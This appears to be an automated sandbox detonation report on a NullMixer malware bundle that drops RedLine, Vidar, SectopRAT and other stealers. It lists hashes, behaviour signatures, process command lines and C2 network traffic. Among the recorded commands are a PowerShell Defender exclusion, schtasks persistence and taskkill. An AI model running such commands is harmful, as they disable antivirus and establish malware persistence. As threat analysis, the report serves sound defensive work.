| MD5 | 623219f1ab995d4382d51862e296993e |
| SHA1 | ab714b5455c3a03280ede906b0341270e5e2b4c3 |
| SHA256 | e50e0bfc2a799dd9fe24d78ab3838d53b4369a435b883918876435c47acf9a78 |
| SHA512 | cf7ea8ed4c3584195803b511b9034695c7ee18d133ed63f51da5e407cc87a90905a2e6264116f67ddb4d0ccc2fff634521906eb04d46250930a6cc19929fd9aa |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Last Version
| MD5 | ef48733031b712ca7027624fff3ab208 |
| SHA1 | da4f3812e6afc4b90d2185f4709dfbb6b47714fa |
| SHA256 | c9ce8dbbe51a4131073db3d6ceef1e11eaca6308ad88a86125f221102d2cee99 |
| SHA512 | ce3a5a429e3796977a8019f47806b8c0671b597ead642fcbfbe3144e2b8112d35a9f2250896b7f215d237d0d19c5966caf3fe674165a6d50e14cb2b88c892029 |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ttbjl2fr.sfy.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | e443ee4336fcf13c698b8ab5f3c173d0 |
| SHA1 | 9bf70b16f03820cbe3158e1f1396b07b8ac9d75a |
| SHA256 | 79e277da2074f9467e0518f0f26ca2ba74914bee82553f935a0ccf64a0119e8b |
| SHA512 | cbf6f6aa0ea69b47f51592296da2b7be1180e7b483c61b4d17ba9ee1a2d3345cbe0987b96f4e25de1438b553db358f330aad8a26e8522601f055c3d5a8313cdd |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 56a4f78e21616a6e19da57228569489b |
| SHA1 | 21bfabbfc294d5f2aa1da825c5590d760483bc76 |
| SHA256 | d036661e765ee8fd18978a2b5501e8df6b220e4bca531d9860407555294c96fb |
| SHA512 | c2c3cd1152bb486028fe75ab3ce0d0bc9d64c4ca7eb8860ddd934b2f6e0140d2c913af4fa082b88e92a6a6d20fd483a1cb9813209f371a0f56374bc97d7f863b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 4df1f8c317d3d33cdc2dfebcbc885d1a |
| SHA1 | abdfa86349ad80655137c78c7febf9d541921550 |
| SHA256 | c0f99364290d48d014583bce813ac08562a0e6bc76e3312ae0277ef9e7340cab |
| SHA512 | d448c472372b1e639746d9d6ba23946001a7856b8e0ef1dc2a3f18321bad2d9d2e6a925736c76dd5c1eb77ce698631a900106360360bdf1a00dbf6fcd5264cd1 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 0e00900d659ac243044b597cd7c30c69 |
| SHA1 | b875c0ef5a85ec00b53c828b3116d81c70d6de6f |
| SHA256 | c774e13a4f914b797aa80e5f0532035b869f256a4b25b5481a8fe6f236bd81cf |
| SHA512 | 400ec5693c17a7b11e74ff3baf6e1ed8ec95a6d7c1c4a673e0aa78ee958c6a205fdd549cf2eaf5aed808c46f3958156cf6fcdf9529026de882b50cea814c6822 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 0769ac90a2c4d32e1062e8b25fabffdd |
| SHA1 | 5197d5b2fd40340efb5f4ff4516d905b7348a7d6 |
| SHA256 | 7bf1c7f661ce582ebe1c9668d3a22a47e5cee9e9c23415a70bac3206e9698614 |
| SHA512 | 9fa54f33976e9b41ed4af119409269038ed04946260df1ea2d0d916b9d0c53912d94f627b377f13b2ba3372a5de756c87090c6bce3cb6488911f7ff0af25ca6a |
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
| MD5 | be0b4b1c809dc419f44b990378cbae31 |
| SHA1 | 5c40c342e0375d8ca7e4cc4e1b81b7ef20a22806 |
| SHA256 | 530bd3b9ec17f111b0658fddeb4585cd6bf6edb1561bdebd1622527c36a63f53 |
| SHA512 | 5ce316cfe5e25b0a54ceb157dee8f85e2c7825d91a0cd5fae0500b68b85dd265903582728d4259428d2e44b561423dac1499edcf0606ac0f78e8485ce3c0af24 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 4bc8a3540a546cfe044e0ed1a0a22a95 |
| SHA1 | 5387f78f1816dee5393bfca1fffe49cede5f59c1 |
| SHA256 | f90fcadf34fbec9cabd9bcfdea0a63a1938aef5ea4c1f7b313e77f5d3f5bbdca |
| SHA512 | e75437d833a3073132beed8280d30e4bb99b32e94d8671528aec53f39231c30476afb9067791e4eb9f1258611c167bfe98b09986d1877ca3ed96ea37b8bceecf |
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-25 09:33
Reported
2024-11-25 09:36
Platform
win7-20241010-en
Max time kernel
59s
Max time network
150s
Command Line
Signatures
NullMixer
Nullmixer family
PrivateLoader
Privateloader family
RedLine
RedLine payload
Redline family
SectopRAT
SectopRAT payload
Sectoprat family
Socelars
Socelars family
Socelars payload
Vidar
Vidar family
Vidar Stealer
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Accesses 2FA software files, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\08240101651be7e1.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.db-ip.com | N/A | N/A |
| N/A | api.db-ip.com | N/A | N/A |
Looks up geolocation information via web service
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1392 set thread context of 2772 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\winnetdriv.exe | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened for modification | C:\Windows\winnetdriv.exe | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\1710990cbc64.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\winnetdriv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\f34b9ab9db6d16.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\1710990cbc64.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\e4b2f18fb52218.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\08240101651be7e010.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\453c5fa76a849.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\e4b2f18fb52218.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\e4b2f18fb52218.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{7493EA61-AB10-11EF-8E0F-52DE62627832} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\e4b2f18fb52218.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [raw certificate blob omitted] | C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\e4b2f18fb52218.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 08240101651be7e1.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 9aa6e16872.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 1710990cbc64.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 53516815d3135fe3.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c c862a054a35.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 4f5baa1083db067.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c f34b9ab9db6d16.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c e4b2f18fb52218.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 453c5fa76a849.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 08240101651be7e010.exe
C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\4f5baa1083db067.exe
4f5baa1083db067.exe
C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\53516815d3135fe3.exe
53516815d3135fe3.exe
C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\e4b2f18fb52218.exe
e4b2f18fb52218.exe
C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe
9aa6e16872.exe
C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\f34b9ab9db6d16.exe
f34b9ab9db6d16.exe
C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\53516815d3135fe3.exe
"C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\53516815d3135fe3.exe"
C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\1710990cbc64.exe
1710990cbc64.exe
C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\08240101651be7e010.exe
08240101651be7e010.exe
C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\c862a054a35.exe
c862a054a35.exe
C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\453c5fa76a849.exe
453c5fa76a849.exe
C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\08240101651be7e1.exe
08240101651be7e1.exe
C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\1710990cbc64.exe
"C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\1710990cbc64.exe" -a
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
C:\Users\Admin\AppData\Local\Temp\chrome2.exe
"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"
C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Windows\winnetdriv.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe" 1732527216 0
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2264 -s 432
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
C:\Users\Admin\AppData\Roaming\services64.exe
"C:\Users\Admin\AppData\Roaming\services64.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\7zS5BC7.tmp\Install.cmd" "
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/16B4c7
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3040 CREDAT:275457 /prefetch:2
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | watira.xyz | udp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | db-ip.com | udp |
| US | 172.67.75.166:443 | db-ip.com | tcp |
| US | 8.8.8.8:53 | api.db-ip.com | udp |
| US | 104.26.5.15:443 | api.db-ip.com | tcp |
| US | 8.8.8.8:53 | www.maxmind.com | udp |
| US | 104.17.27.25:80 | www.maxmind.com | tcp |
| GB | 37.0.8.235:80 | | tcp |
| US | 8.8.8.8:53 | www.listincode.com | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.200.3:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | prophefliloc.tumblr.com | udp |
| US | 74.114.154.18:443 | prophefliloc.tumblr.com | tcp |
| US | 8.8.8.8:53 | music-sec.xyz | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | www.iyiqian.com | udp |
| MD | 176.123.2.239:80 | 176.123.2.239 | tcp |
| SG | 13.251.16.150:80 | www.iyiqian.com | tcp |
| US | 8.8.8.8:53 | www.wpdsfds23x.com | udp |
| N/A | 127.0.0.1:49266 | | tcp |
| N/A | 127.0.0.1:49269 | | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| SG | 37.0.11.8:80 | | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| GB | 95.100.245.144:80 | www.microsoft.com | tcp |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 104.21.5.208:80 | wfsdragon.ru | tcp |
| SG | 37.0.10.236:80 | | tcp |
| LV | 45.142.213.135:30058 | | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| LV | 45.142.213.135:30058 | | tcp |
| LV | 45.142.213.135:30058 | | tcp |
| SG | 37.0.10.236:80 | | tcp |
| US | 8.8.8.8:53 | sanctam.net | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| LV | 45.142.213.135:30058 | | tcp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| LV | 45.142.213.135:30058 | | tcp |
| LV | 45.142.213.135:30058 | | tcp |
| SG | 37.0.10.236:80 | | tcp |
| LV | 45.142.213.135:30058 | | tcp |
| LV | 45.142.213.135:30058 | | tcp |
| LV | 45.142.213.135:30058 | | tcp |
| LV | 45.142.213.135:30058 | | tcp |
| SG | 37.0.10.236:80 | | tcp |
| LV | 45.142.213.135:30058 | | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| LV | 45.142.213.135:30058 | | tcp |
| LV | 45.142.213.135:30058 | | tcp |
| SG | 37.0.10.236:80 | | tcp |
| LV | 45.142.213.135:30058 | | tcp |
| LV | 45.142.213.135:30058 | | tcp |
| LV | 45.142.213.135:30058 | | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe
| MD5 | aaaf685d045b423d4d96ecaca344b4d5 |
| SHA1 | f2264a40421e66029db1cdf7fe8bb8ada2614862 |
| SHA256 | f77fee8eef443261bc896ac6f10c099277a5fd31baa88f4fa171905157c5d6d8 |
| SHA512 | 8e01c8cf6623250050c099f2cb139aeac6b6318841d23d7701e6ceffc0dcdba79220533af1e84a34750ac7efc2d56750aeb9a5468ca12a12dab9ce2f1899ec4e |
\Users\Admin\AppData\Local\Temp\7zSCD9986B6\libgcc_s_dw2-1.dll
| MD5 | 9aec524b616618b0d3d00b27b6f51da1 |
